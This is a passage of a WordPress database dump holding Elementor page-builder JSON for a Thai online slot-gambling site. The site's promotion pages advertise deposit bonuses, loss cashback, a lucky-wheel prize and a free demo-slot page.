data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Reward_10_-_Megabet333-Biz.webp\",\"id\":160,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Lucky_wheel_-_Megabet333-Biz.webp\",\"id\":156,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 naijan<\\/strong> \\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\">naijan <strong data-start=\\\"2414\\\" data-end=\\\"2445\\\">\\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1369,167,'_thumbnail_id','53'),(1375,169,'_elementor_edit_mode','builder'),(1376,169,'_elementor_template_type','wp-page'),(1377,169,'_elementor_version','3.32.5'),(1378,169,'_elementor_pro_version','3.32.3'),(1379,169,'_wp_page_template','default'),(1380,169,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1381,169,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/demoslot\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c 